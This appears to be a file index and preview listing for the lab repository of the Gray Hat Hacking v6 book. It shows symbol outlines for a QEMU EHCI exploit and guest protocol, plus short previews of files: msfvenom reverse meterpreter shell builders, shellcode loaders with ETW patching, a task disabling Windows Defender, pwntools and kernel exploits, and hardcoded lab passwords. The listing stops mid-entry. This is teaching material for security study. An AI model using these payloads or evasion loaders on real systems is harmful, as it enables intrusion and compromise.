class StandardHeader (line 252) | class StandardHeader(PciHeader):
method __init__ (line 253) | def __init__(self, regs):
method reg_nums (line 265) | def reg_nums(self):
class Pci2Pci (line 268) | class Pci2Pci(PciHeader):
method __init__ (line 269) | def __init__(self, regs):
class Cardbus (line 292) | class Cardbus(PciHeader):
method __init__ (line 293) | def __init__(self, regs):
class Bar (line 317) | class Bar:
method __init__ (line 318) | def __init__(self, reg_num, reg, size, reg_high):
class Session (line 333) | class Session(session.Session):
method __init__ (line 338) | def __init__(self, guest_cls):
method scan_pci (line 343) | def scan_pci(self):
method inject_read_bar_code (line 412) | def inject_read_bar_code(self):
method scan_device (line 481) | def scan_device(self, bus, slot, func, regs):
method print_bar_info (line 521) | def print_bar_info(self, bar):
method print_dev_info (line 524) | def print_dev_info(self, bus, slot, func, dev):
method on_boot (line 534) | def on_boot(self, body):
FILE: ch26/labs/protocol.c
type msg_buffer (line 8) | struct msg_buffer {
type msg_buffer (line 13) | struct msg_buffer
type msg_buffer (line 14) | struct msg_buffer
type msg_buffer (line 15) | struct msg_buffer
function put_tp (line 32) | void put_tp(bool is_oob, TP prefix) {
function get_tp (line 37) | TP get_tp() {
function put_primitive (line 43) | void put_primitive(bool is_oob, TP prefix, const Primitive_t *value) {
function get_primitive (line 78) | void get_primitive(TP prefix, Primitive_t *value) {
function put_array (line 110) | void put_array(bool is_oob, const Array_t *array, const void *data) {
function get_array (line 120) | void get_array(Array_t *array, void **dst_ptr) {
function put_cstring (line 128) | void put_cstring(bool is_oob, const char *ptr) {
function _put_va (line 134) | static void _put_va(bool is_oob, TP prefix, va_list args) {
function _get_va (line 158) | static void _get_va(TP prefix, va_list args) {
function put_va (line 179) | void put_va(bool is_oob, ...) {
function get_va (line 187) | void get_va(TP prefix, ...) {
function send_msg (line 194) | void send_msg(MT msg_type) {
function msg_hdr_valid (line 208) | static bool msg_hdr_valid(const MsgHdr *hdr) {
function recv_msg (line 213) | void recv_msg() {
function _reset_oob_buffer (line 222) | void _reset_oob_buffer() {
FILE: ch26/labs/protocol.h
type MT (line 10) | typedef enum {
type MsgHdr (line 20) | typedef struct {
type TP (line 27) | typedef enum {
type Primitive_t (line 45) | typedef union {
type Array_t (line 56) | typedef struct {
type OOBType (line 61) | typedef enum {OOBPrint = UINT32_C(0), OOBAssert} OOBType;
type OpType (line 62) | typedef enum {OpWrite = UINT32_C(0), OpExec} OpType;
FILE: ch26/labs/protocol.py
function make_adapter (line 38) | def make_adapter(cInt, fInt):
class ArrayAdapter (line 46) | class ArrayAdapter(c.Adapter):
method _decode (line 47) | def _decode(self, obj, context, path):
method _encode (line 51) | def _encode(self, obj, context, path):
class ListAdapter (line 55) | class ListAdapter(c.Adapter):
method _decode (line 56) | def _decode(self, obj, context, path):
method _encode (line 65) | def _encode(self, obj, context, path):
class BodyAdapter (line 92) | class BodyAdapter(c.Adapter):
method _decode (line 93) | def _decode(self, obj, context, path):
method _encode (line 96) | def _encode(self, obj, context, path):
function recv (line 116) | def recv(reader):
function send (line 122) | def send(writer, body):
FILE: ch26/labs/qemu_guest.py
class Guest (line 7) | class Guest(guest.Guest):
method __enter__ (line 11) | def __enter__(self):
FILE: ch26/labs/qemu_xpl.py
class ExploitError (line 157) | class ExploitError(Exception):
class Exploit (line 160) | class Exploit(ehci.Session):
method trigger_overflow (line 165) | def trigger_overflow(self, overflow_len, data):
method overflow_data (line 170) | def overflow_data(self):
method overflow_build (line 178) | def overflow_build(self, overflow_len, setup_len, setup_index):
method relative_write (line 186) | def relative_write(self, offset, data: IOVector):
method relative_read (line 196) | def relative_read(self, offset, length):
method addr_of (line 214) | def addr_of(self, field):
method arbitrary_read_near (line 217) | def arbitrary_read_near(self, addr, data_len):
method relative_write_2 (line 221) | def relative_write_2(self, offset, data, data_buf_contents):
method arbitrary_write (line 234) | def arbitrary_write(self, addr, data, data_buf_contents):
method descr_build (line 238) | def descr_build(self, address_list, start_addr):
method leak_multiple (line 254) | def leak_multiple(self, address_list):
method leak_module_base (line 264) | def leak_module_base(self, fptr):
method leak_one (line 280) | def leak_one(self, addr):
method on_boot (line 284) | def on_boot(self, body):
FILE: ch26/labs/remotemem.py
class RemoteMemoryError (line 8) | class RemoteMemoryError(Exception):
class RemoteMemory (line 11) | class RemoteMemory:
method __init__ (line 12) | def __init__(self):
method add_region (line 16) | def add_region(self, base, size):
method del_region (line 21) | def del_region(self, base, size):
method alloc (line 26) | def alloc(self, size):
method free (line 35) | def free(self, address):
method free_all (line 39) | def free_all(self):
class PageAlloc (line 44) | class PageAlloc:
method __init__ (line 45) | def __init__(self, mem, data_len):
method start (line 54) | def start(self):
method end (line 57) | def end(self):
method size (line 60) | def size(self):
method page_list (line 63) | def page_list(self):
method free (line 66) | def free(self):
class Chunk (line 71) | class Chunk:
method __init__ (line 72) | def __init__(self, data, offset=None):
method __eq__ (line 76) | def __eq__(self, other):
method __lt__ (line 79) | def __lt__(self, other):
class IOVector (line 83) | class IOVector:
method __init__ (line 84) | def __init__(self, chunk_list=None):
method size (line 91) | def size(self):
method append (line 98) | def append(self, data, offset=None):
method iter (line 104) | def iter(self):
FILE: ch26/labs/session.py
class OOBType (line 10) | class OOBType(Enum):
class Session (line 14) | class Session:
method __init__ (line 19) | def __init__(self, guest_cls=Guest):
method timeout_handler (line 28) | def timeout_handler(signum, frame):
method context_save (line 31) | def context_save(self):
method context_restore (line 36) | def context_restore(self):
method code (line 41) | def code(self, code):
method execute (line 44) | def execute(self, code):
method fuzz (line 47) | def fuzz(self, reply):
method on_boot (line 50) | def on_boot(self, body):
method install_idt (line 54) | def install_idt(self, vectors=30):
method make_vector_handler (line 69) | def make_vector_handler(self, vec):
method is_oob (line 105) | def is_oob(self, msg_type, body):
method is_boot (line 121) | def is_boot(self, msg_type):
method next_message (line 124) | def next_message(self):
method run (line 132) | def run(self):
method run_loop (line 145) | def run_loop(self):
FILE: ch26/labs/trigger.py
class Trigger (line 8) | class Trigger(ehci.Session):
method trigger_overflow (line 12) | def trigger_overflow(self, overflow_len, data):
method on_boot (line 17) | def on_boot(self, body):
FILE: ch27/lab/ansible/roles/kali_customizations/files/getEC2WinCreds.py
function decrypt (line 28) | def decrypt(ciphertext, keyfile=args.keyfile):
function get_ec2_info (line 50) | def get_ec2_info():
FILE: ch29/Lab/targets/web/app.py
function get_hit_count (line 14) | def get_hit_count():
function enter (line 26) | def enter():
[
{
"path": ".gitignore",
"chars": 81,
"preview": "*.tfstate*\n**/.terraform.lock.hcl\n*.tvars\n**/.terraform\n*.DS_Store\n**/*.DS_Store\n"
},
{
"path": "CloudSetup/README.md",
"chars": 4025,
"preview": "The following instructions are for all AWS labs in this book. There are separate instructions for Azure, inside Chapter"
},
{
"path": "CloudSetup/build-images.sh",
"chars": 271,
"preview": "#!/bin/bash\nPACKER=/usr/bin/packer\nif [ -f ~/.local/bin/packer ] ; then \n\tPACKER=~/.local/bin/packer\nfi\ncd kali-base\n$P"
},
{
"path": "CloudSetup/delete-old-images.sh",
"chars": 901,
"preview": "#!/bin/bash\nRED='\\033[0;31m'\nWHITE='\\033[0;37m'\nGREEN='\\033[0;32m'\nNC='\\033[0m' # No Color\n\nimagelist=(ghh-server2016 gh"
},
{
"path": "CloudSetup/delete-orphaned-snaps.sh",
"chars": 837,
"preview": "#!/bin/bash\nRED='\\033[0;31m'\nWHITE='\\033[0;37m'\nGREEN='\\033[0;32m'\nNC='\\033[0m' # No Color\n\nprintf \"${WHITE}[*] Retrievi"
},
{
"path": "CloudSetup/deprovision.sh",
"chars": 1160,
"preview": "#!/bin/bash\n\nAWS=`which aws`\nJQ=`which jq`\n\nif ! test -f \"$AWS\"; then\n\techo \"AWS cli is required for execution, please i"
},
{
"path": "CloudSetup/eksall.template",
"chars": 666,
"preview": "{\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Action\": \"eks:*\""
},
{
"path": "CloudSetup/find-orphaned-snaps.sh",
"chars": 749,
"preview": "#!/bin/bash\nRED='\\033[0;31m'\nWHITE='\\033[0;37m'\nGREEN='\\033[0;32m'\nNC='\\033[0m' # No Color\n\nprintf \"${WHITE}[*] Retrievi"
},
{
"path": "CloudSetup/install-cloud-tools.sh",
"chars": 699,
"preview": "#!/bin/bash\n\n#Kali VMWare Image doesn't have pip3\n\necho \"[+] Installing Python3 pip\"\nsudo apt install python3-pip -y\n\nec"
},
{
"path": "CloudSetup/kali-base/config.sh",
"chars": 1013,
"preview": "#!/bin/bash\n\nexport DEBIAN_FRONTEND=noninteractive\nERRORS=0\napt-get update && apt-get -y upgrade\napt-get -y dist-upgrade"
},
{
"path": "CloudSetup/kali-base/kali.hcl",
"chars": 1508,
"preview": "data \"amazon-ami\" \"ghh_kali\" {\n filters = {\n name = \"debian-10-amd64*\"\n root-device-type = \"ebs"
},
{
"path": "CloudSetup/provision.sh",
"chars": 1891,
"preview": "#!/bin/bash\n\nAWS=`which aws`\nJQ=`which jq`\nif ! test -f \"$AWS\"; then\n\techo \"AWS cli is required for execution, please in"
},
{
"path": "CloudSetup/server-2016-base/bootstrap.ps1",
"chars": 1476,
"preview": "\nWrite-Host \"Disabling Telemetry...\"\nSet-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Da"
},
{
"path": "CloudSetup/server-2016-base/server2016_template.json",
"chars": 1629,
"preview": "{\n \"variables\": {\n \"name\": \"ghh-server2016-{{timestamp}}\",\n \"aws_region\": \"us-east-1\",\n \"aws_ins"
},
{
"path": "CloudSetup/server-2016-base/user_data.ps1",
"chars": 1434,
"preview": "<powershell>\n\nwrite-output \"Running User Data Script\"\nwrite-host \"(host) Running User Data Script\"\n\nSet-ExecutionPolicy "
},
{
"path": "CloudSetup/server-2019-base/bootstrap.ps1",
"chars": 1476,
"preview": "\nWrite-Host \"Disabling Telemetry...\"\nSet-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Da"
},
{
"path": "CloudSetup/server-2019-base/server2019_template.json",
"chars": 1629,
"preview": "{\n \"variables\": {\n \"name\": \"ghh-server2019-{{timestamp}}\",\n \"aws_region\": \"us-east-1\",\n \"aws_ins"
},
{
"path": "CloudSetup/server-2019-base/user_data.ps1",
"chars": 1434,
"preview": "<powershell>\n\nwrite-output \"Running User Data Script\"\nwrite-host \"(host) Running User Data Script\"\n\nSet-ExecutionPolicy "
},
{
"path": "README.md",
"chars": 28,
"preview": "# GHHv6\nGray Hat Hacking v6\n"
},
{
"path": "ch02/client.py",
"chars": 241,
"preview": "#client.py\nimport socket\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect(('localhost', 4242))\ns.send(b'S"
},
{
"path": "ch02/fmt_str.c",
"chars": 157,
"preview": "#include <stdio.h>\n\nint main(void){\n double x = 23.5644;\n printf(\"The value of x is %5.2f\\n\", x);\n printf(\"The value "
},
{
"path": "ch02/hello.asm",
"chars": 1175,
"preview": "section .data ; section declaration\nmsg db \"Hello, haxor!\",0xa ; our string with a carriage retur"
},
{
"path": "ch02/hello.c",
"chars": 275,
"preview": "// hello.c // customary comment of program name\n#include <stdio.h> // needed for screen prin"
},
{
"path": "ch02/ifelse.c",
"chars": 218,
"preview": "#include <stdio.h>\n\nint main(void){\n int x = 0;\n while(1){\n if (x == 0) {\n printf(\"x = %d\\n\", x);\n x++;\n "
},
{
"path": "ch02/meet.c",
"chars": 658,
"preview": "// meet.c\n#include <stdio.h> // needed for screen printing\n#include <string.h> // needed for strcpy\nvoid "
},
{
"path": "ch02/memory.c",
"chars": 898,
"preview": "// memory.c\n#include <stdlib.h>\n#include <string.h>\n/* memory.c */ // this comment simply holds the program name\n"
},
{
"path": "ch02/targets",
"chars": 78,
"preview": "RPC-DCOM 10.10.20.1,10.10.20.4\nSQL-SA-blank-pw 10.10.20.27,10.10.20.28\n"
},
{
"path": "ch02/while_ex.c",
"chars": 121,
"preview": "#include <stdio.h>\n\nint main(void){\n int x = 0;\n\n while (x<10) {\n printf(\"x = %d\\n\", x);\n x++;\n }\n return 0;\n}"
},
{
"path": "ch03/heapme_demo.c",
"chars": 359,
"preview": "//heapme_demo.c\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n\nvoid *x[8];\n\nint main() "
},
{
"path": "ch03/hello.c",
"chars": 207,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\nint main() {\n\tchar *ghh = malloc(30);\n\tstrncpy(ghh, \"Gray Hat"
},
{
"path": "ch03/leak-bof-exploit.py",
"chars": 1012,
"preview": "#!/usr/bin/env python3\n\nfrom pwn import *\ncontext.update(arch='amd64', os='linux')\n\nelf = ELF(\"./leak-bof\")\nlibc = ELF(\""
},
{
"path": "ch03/leak-bof.c",
"chars": 281,
"preview": "// leak-bof.c\n#include <stdio.h>\n#include <unistd.h>\n\nvoid vuln() {\n char buff[128];\n printf(\"Overflows with 128 b"
},
{
"path": "ch04/students-patched.c",
"chars": 2456,
"preview": "// students.c\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\ntypedef struct {\n char name[24];\n int id"
},
{
"path": "ch04/students.c",
"chars": 2520,
"preview": "// students.c\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\ntypedef struct {\n char name[24];\n int id"
},
{
"path": "ch04/students.csv",
"chars": 59,
"preview": "Jordan,84\nMilley,91\nDebbie,65\nJoseph,60\nXuang,98\nTamara,88\n"
},
{
"path": "ch05/myAtoi.c",
"chars": 293,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n\nint myAtoi(char *str){\n int res = 0;\n for (int i = 0; str[i] != '\\0'; ++i)"
},
{
"path": "ch05/myProg.c",
"chars": 346,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\nint func1(char* input)\n{\n\n\tchar string1[60];\n\n\tstrcpy(string"
},
{
"path": "ch07/Lab/ansible/ansible.cfg",
"chars": 66,
"preview": "[defaults]\nhost_key_checking = False\nenable_task_debugger = True\n\n"
},
{
"path": "ch07/Lab/ansible/ch07_playbook.yml",
"chars": 456,
"preview": "---\n- hosts: dc\n roles:\n - common\n - windows_dns_server\n - windows_domain_controller\n - windows_domain_user"
},
{
"path": "ch07/Lab/ansible/roles/common/defaults/main.yml",
"chars": 5,
"preview": "---\n\n"
},
{
"path": "ch07/Lab/ansible/roles/common/handlers/main.yml",
"chars": 4,
"preview": "---\n"
},
{
"path": "ch07/Lab/ansible/roles/common/meta/main.yml",
"chars": 308,
"preview": "---\ngalaxy_info:\n role_name: install_misc_software\n author: Russ Nolen rnolen@splunk.com\n description: Install some b"
},
{
"path": "ch07/Lab/ansible/roles/common/tasks/chocolatey-components.yml",
"chars": 366,
"preview": "---\n- name: Install Chocolately via Powershell\n win_shell: \"Set-ExecutionPolicy Bypass -Scope Process -Force; [System.N"
},
{
"path": "ch07/Lab/ansible/roles/common/tasks/main.yml",
"chars": 284,
"preview": "---\n# need to wrap an if statement around this one\n# make it windows specific\n- name : Disable Windows Firewall\n win_fi"
},
{
"path": "ch07/Lab/ansible/roles/common/tasks/windows-components.yml",
"chars": 280,
"preview": "---\n- name: Install the Visual C++ Redistributable\n win_package:\n path: \"https://download.microsoft.com/download/9/3"
},
{
"path": "ch07/Lab/ansible/roles/common/tasks/windows-disable-defender.yml",
"chars": 210,
"preview": "---\n\n- name: Disable Windows Defender\n win_regedit:\n key: \"HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\R"
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/addshare.txt",
"chars": 141,
"preview": "[ghh]\n comment = GHH Share\n browseable = yes\n path = /tmp\n printable = no\n guest ok = yes\n read only = yes\n "
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/covenant.patch",
"chars": 296,
"preview": "--- /usr/share/kaboxer/covenant.kaboxer.orig\t2021-09-12 19:28:35.392506176 +0000\n+++ /usr/share/kaboxer/covenant.kaboxer"
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/shells/build_csharp.sh",
"chars": 469,
"preview": "#!/bin/bash\n\nSC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f csharp --platform windows --arch x64 LHOST=10.0.0.4"
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/shells/build_go.sh",
"chars": 330,
"preview": "#!/bin/bash\n\nSC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f base64 --platform windows --arch x64 LHOST=10.0.0.4"
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/shells/build_nim.sh",
"chars": 542,
"preview": "#!/bin/bash\n\nSC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f csharp --platform windows --arch x64 LHOST=10.0.0.4"
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/shells/csharp.template",
"chars": 1559,
"preview": "using System;\nusing System.Runtime.InteropServices;\n\n\nnamespace GHHSCLauncher\n{\n class Program\n {\n private "
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/shells/execute.template",
"chars": 2294,
"preview": "import winim/lean\nimport strformat\nimport dynlib\nimport osproc\n\nconst patch: array[1, byte] = [byte 0xc3]\n\nproc Patchntd"
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/shells/go.mod",
"chars": 104,
"preview": "module createFiber.go\n\ngo 1.15\n\nrequire golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7 // indirect\n"
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/shells/go.sum",
"chars": 207,
"preview": "golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7 h1:c20P3CcPbopVp2f7099WLOqSNKURf30Z0uq66HpijZY=\ngolang.org/x/sys v0."
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/shells/go.template",
"chars": 2454,
"preview": "// Inspired by ired.team and Ne0nd0g's go-shellcode repository\n// Reference: https://github.com/Ne0nd0g/go-shellcode\n// "
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/files/shells/nim.template",
"chars": 2816,
"preview": "# Adapted from Byt3bl33der's ETW code.\nimport winim/lean\nimport strformat\nimport dynlib\nimport osproc\n\n# 0xc3 = RET in a"
},
{
"path": "ch07/Lab/ansible/roles/kali_customizations/tasks/main.yml",
"chars": 1777,
"preview": "---\n- name: Make python3 default\n alternatives:\n name: python\n path: /usr/bin/python3\n link: /usr/bin/pyth"
},
{
"path": "ch07/Lab/ansible/roles/target_customizations/tasks/main.yml",
"chars": 3006,
"preview": "---\n- name: Update Local Security Policy to allow users to run scheduled tasks\n win_user_right:\n name: SeBatchLogonR"
},
{
"path": "ch07/Lab/ansible/roles/windows_client_join_domain/tasks/main.yml",
"chars": 654,
"preview": "---\n- name: Gather facts from new server\n setup:\n filter: ansible_default_ipv4.address\n \n- name: setu"
},
{
"path": "ch07/Lab/ansible/roles/windows_dns_server/defaults/main.yml",
"chars": 0,
"preview": ""
},
{
"path": "ch07/Lab/ansible/roles/windows_dns_server/handlers/main.yml",
"chars": 38,
"preview": "- name: restart machine\n win_reboot:\n"
},
{
"path": "ch07/Lab/ansible/roles/windows_dns_server/tasks/features.yml",
"chars": 197,
"preview": "---\n- name: features | Installing Windows DNS Server\n win_feature:\n name: DNS\n state: present\n include_managem"
},
{
"path": "ch07/Lab/ansible/roles/windows_dns_server/tasks/main.yaml",
"chars": 47,
"preview": "- include: features.yml\n- include: reboot.yml \n"
},
{
"path": "ch07/Lab/ansible/roles/windows_dns_server/tasks/reboot.yml",
"chars": 190,
"preview": "---\n- name: reboot | Rebooting Server\n win_reboot:\n reboot_timeout_sec: 3600\n when: >\n _windows_dns_server['rest"
},
{
"path": "ch07/Lab/ansible/roles/windows_domain_controller/defaults/main.yml",
"chars": 0,
"preview": ""
},
{
"path": "ch07/Lab/ansible/roles/windows_domain_controller/handlers/main.yml",
"chars": 38,
"preview": "- name: restart machine\n win_reboot:\n"
},
{
"path": "ch07/Lab/ansible/roles/windows_domain_controller/tasks/create.yml",
"chars": 1445,
"preview": "---\n# tasks file for ansible-windows-domain-controller\n#\n\n\n- name: set local admin password\n win_user:\n name: Admini"
},
{
"path": "ch07/Lab/ansible/roles/windows_domain_controller/tasks/main.yaml",
"chars": 45,
"preview": "- include: create.yml\n- include: reboot.yml \n"
},
{
"path": "ch07/Lab/ansible/roles/windows_domain_controller/tasks/reboot.yml",
"chars": 245,
"preview": "---\n- name: reboot | Rebooting Server\n win_reboot:\n reboot_timeout_sec: 3600\n shutdown_timeout_sec: 3600\n when: "
},
{
"path": "ch07/Lab/ansible/roles/windows_domain_users_groups/files/usermods.ps1",
"chars": 3214,
"preview": " Import-Module ActiveDirectory\n#Bring up an Active Directory command prompt so we can use this later on in the script\n#G"
},
{
"path": "ch07/Lab/ansible/roles/windows_domain_users_groups/tasks/main.yml",
"chars": 1195,
"preview": "---\n- name: Disable domain password complexity\n win_shell: 'Get-ADDefaultDomainPasswordPolicy -Current LoggedOnUser | S"
},
{
"path": "ch07/Lab/ansible/roles/windows_local_group_membership/tasks/main.yml",
"chars": 193,
"preview": "---\n- name: add users to local groups for remote login\n win_group_membership:\n name: \"Remote Desktop Users\"\n "
},
{
"path": "ch07/Lab/ansible/vars/users.yml",
"chars": 333,
"preview": "---\n#domain_users:\n#- { name : \"target\", password : \"Winter2021\" , groups : \"\" }\n#- { name : \"ghhadmin\" , password : \"Gr"
},
{
"path": "ch07/Lab/ansible/vars/vars.yml",
"chars": 234,
"preview": "windows_domain_controller_info:\n dns_domain_name: ghh.local\n domain_admin_password: GrayHatHack1ng!\n domain_admin_"
},
{
"path": "ch07/Lab/build.sh",
"chars": 145,
"preview": "#!/bin/bash\n\ncd terraform \nterraform init && terraform validate && terraform apply\ncd ../ansible\nansible-playbook -i inv"
},
{
"path": "ch07/Lab/destroy.sh",
"chars": 43,
"preview": "#!/bin/bash\ncd terraform\nterraform destroy\n"
},
{
"path": "ch07/Lab/terraform/aws_data.tf",
"chars": 706,
"preview": "data \"aws_availability_zones\" \"this\" {\n state = \"available\"\n}\n\ndata \"aws_ami\" \"ghh-kali\" {\n most_recent = true\n\n filt"
},
{
"path": "ch07/Lab/terraform/aws_hosts.tf",
"chars": 1527,
"preview": "\nlocals {\n dc-userdata = <<EOF\n<powershell>\n $admin = [adsi](\"WinNT://./administrator, user\")\n $admin.psbase.invoke(\""
},
{
"path": "ch07/Lab/terraform/inventory.tmpl",
"chars": 124,
"preview": "${cat}:\n hosts:\n%{for addr in ip_addrs ~}\n ${addr}:\n%{endfor ~}\n vars:\n%{for var in vars ~}\n ${var}\n%{endfor"
},
{
"path": "ch07/Lab/terraform/main.tf",
"chars": 150,
"preview": "provider \"aws\" {\n shared_credentials_file = var.shared_credentials_file\n region = \"us-east-1\"\n profi"
},
{
"path": "ch07/Lab/terraform/outputs.tf",
"chars": 1703,
"preview": "output \"dc_password\" { value = rsadecrypt(aws_instance.ghh_dc.password_data, file(var.key_path)) }\noutput \"target_pa"
},
{
"path": "ch07/Lab/terraform/terraform.tfvars-orig",
"chars": 34,
"preview": "key_path=\"<path to your SSH KEY>\"\n"
},
{
"path": "ch07/Lab/terraform/variables.tf",
"chars": 676,
"preview": "variable \"aws_region\" {\n default = \"us-east-1\"\n}\nvariable \"aws_profile\" {\n default = \"ghh\"\n}\nvariable \"dc_password\" {\n"
},
{
"path": "ch07/Lab/terraform/versions.tf",
"chars": 0,
"preview": ""
},
{
"path": "ch07/Lab/terraform/vpc.tf",
"chars": 2961,
"preview": "resource \"aws_vpc\" \"this\" {\n\n cidr_block = \"10.0.0.0/16\"\n enable_dns_hostnames = true\n enable_dns_support "
},
{
"path": "ch07/README.md",
"chars": 2625,
"preview": "# Gray Hat Hacking v6 Chapter 07\r\nThis directory contains all the components necessary for Chapter 07.\r\n\r\n## Lab Informa"
},
{
"path": "ch08/winlogbeat.yml",
"chars": 3120,
"preview": "# Example for the Beats on WEF server of DetectionLab\n# Configuration version: 2021-05-31\n# Derived from https://github."
},
{
"path": "ch10/ch10_6_exploit.py",
"chars": 479,
"preview": "#!/usr/bin/env python3\n#ch10_6_exploit.py\nfrom pwn import *\n\ncontext(bits=32, arch='i386')\n\n# Connect to vulnerable ch10"
},
{
"path": "ch10/getenv.c",
"chars": 170,
"preview": "//getenv.c\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\nint main() {\n printf(\"0x%08x\\n\", (getenv(\"SHEL"
},
{
"path": "ch10/meet.c",
"chars": 658,
"preview": "// meet.c\n#include <stdio.h> // needed for screen printing\n#include <string.h> // needed for strcpy\nvoid "
},
{
"path": "ch10/meet_exploit.py",
"chars": 486,
"preview": "#!/usr/bin/env python3\n#meet_exploit.py\n\nfrom pwn import *\ncontext.update(arch='i386', os='linux')\n\nshellcode = b\"\\x31\\x"
},
{
"path": "ch10/overflow.c",
"chars": 209,
"preview": "//overflow.c\n#include <string.h>\nint main(){\n char str1[10]; //declare a 10 byte string\n //next, copy 35 bytes "
},
{
"path": "ch10/shellcode.c",
"chars": 785,
"preview": "#include <stdio.h>\n#include <sys/mman.h>\n\nconst char shellcode[] = //setuid(0) & Aleph1's famous shellcode, see ref.\n\"\\"
},
{
"path": "ch10/smallbuff.c",
"chars": 176,
"preview": "//smallbuff.c\n#include <string.h>\nint main(int argc, char * argv[]){\n char buff[10]; //small buffer\n strcpy(buff,"
},
{
"path": "ch10/smallbuff_exploit.py",
"chars": 268,
"preview": "#!/usr/bin/env python3\n#smallbuf_exploit.py\n\nfrom pwn import *\n\n#Get SHELLCODE env\nenvp = process(\"./getenv\")\nshellcode_"
},
{
"path": "ch11/README.md",
"chars": 511,
"preview": "The Kali version used at the time of writing was 2020.4 (GCC 10.2.0). Newer Kali/GCC versions breaks the `exploit3.py` a"
},
{
"path": "ch11/exploit1.py",
"chars": 593,
"preview": "from pwn import *\n\n# Lab 11-2: Bypassing Non-executable stack (NX) with Return Oriented Programming (ROP)\n# gcc -no-pie "
},
{
"path": "ch11/exploit2.py",
"chars": 1358,
"preview": "from pwn import *\n\n# Lab 11-3: Defeating Stack Canaries\n# echo 0 | sudo tee /proc/sys/kernel/randomize_va_space\n\ncontext"
},
{
"path": "ch11/exploit3-v2.py",
"chars": 2050,
"preview": "from pwn import *\n\n# Lab 11-4: ASLR bypass with an Information Leak\n# gcc -no-pie -fstack-protector vuln.c -o vuln\n# ech"
},
{
"path": "ch11/exploit3.py",
"chars": 1750,
"preview": "from pwn import *\n\n# Lab 11-4: ASLR bypass with an Information Leak\n# gcc -no-pie -fstack-protector vuln.c -o vuln\n# ech"
},
{
"path": "ch11/exploit4.py",
"chars": 1932,
"preview": "from pwn import *\n\n# Lab 11-5: PIE bypass with an Information Leak\n# gcc -fstack-protector vuln.c -o vuln\n# echo 2 | sud"
},
{
"path": "ch11/vuln.c",
"chars": 2180,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <unistd.h>\n#include <neti"
},
{
"path": "ch12/run1.sh",
"chars": 340,
"preview": "#!/bin/sh\n\n/usr/bin/qemu-system-x86_64 \\\n\t-m 64 \\\n\t-kernel ./stackprotector-disabled/bzImage \\\n\t-nographic \\\n\t-append \"r"
},
{
"path": "ch12/run2.sh",
"chars": 314,
"preview": "#!/bin/sh\n\n/usr/bin/qemu-system-x86_64 \\\n\t-m 64 \\\n\t-kernel bzImage \\\n\t-nographic \\\n\t-append \"rw console=ttyS0 nokaslr qu"
},
{
"path": "ch12/run3.sh",
"chars": 333,
"preview": "#!/bin/sh\n\n/usr/bin/qemu-system-x86_64 \\\n\t-m 64 \\\n\t-kernel bzImage \\\n\t-nographic \\\n\t-append \"rw console=ttyS0 nokaslr qu"
},
{
"path": "ch12/run4.sh",
"chars": 338,
"preview": "#!/bin/sh\n\n/usr/bin/qemu-system-x86_64 \\\n\t-m 64 \\\n\t-kernel bzImage \\\n\t-nographic \\\n\t-append \"rw console=ttyS0 nokaslr qu"
},
{
"path": "ch12/run5.sh",
"chars": 330,
"preview": "#!/bin/sh\n\n/usr/bin/qemu-system-x86_64 \\\n\t-m 64 \\\n\t-kernel bzImage \\\n\t-nographic \\\n\t-append \"rw console=ttyS0 quiet\" \\\n\t"
},
{
"path": "ch12/shared/.ash_history",
"chars": 0,
"preview": ""
},
{
"path": "ch12/shared/exploit1/exploit.c",
"chars": 1308,
"preview": "\n#define _GNU_SOURCE\n#include <stdio.h>\n#include <fcntl.h>\n#include <unistd.h>\n#include <stdlib.h>\n\nunsigned long user_c"
},
{
"path": "ch12/shared/exploit2/exploit.c",
"chars": 1475,
"preview": "#define _GNU_SOURCE\n#include <stdio.h>\n#include <fcntl.h>\n#include <unistd.h>\n#include <stdlib.h>\n\nunsigned long user_cs"
},
{
"path": "ch12/shared/exploit3/exploit.c",
"chars": 1736,
"preview": "#define _GNU_SOURCE\n#include <stdio.h>\n#include <fcntl.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <sys/mman.h>\n"
},
{
"path": "ch12/shared/exploit4/exploit.c",
"chars": 2645,
"preview": "#define _GNU_SOURCE\n#include <stdio.h>\n#include <fcntl.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <sys/mman.h>\n"
},
{
"path": "ch12/shared/exploit5/exploit.c",
"chars": 2771,
"preview": "#define _GNU_SOURCE\n#include <stdio.h>\n#include <fcntl.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <sys/mman.h>\n"
},
{
"path": "ch12/shared/leak.c",
"chars": 507,
"preview": "#define _GNU_SOURCE\n#include <stdio.h>\n#include <fcntl.h>\n#include <unistd.h>\n#include <stdlib.h>\n\nint main() {\n\n int"
},
{
"path": "ch13/hello.c",
"chars": 59,
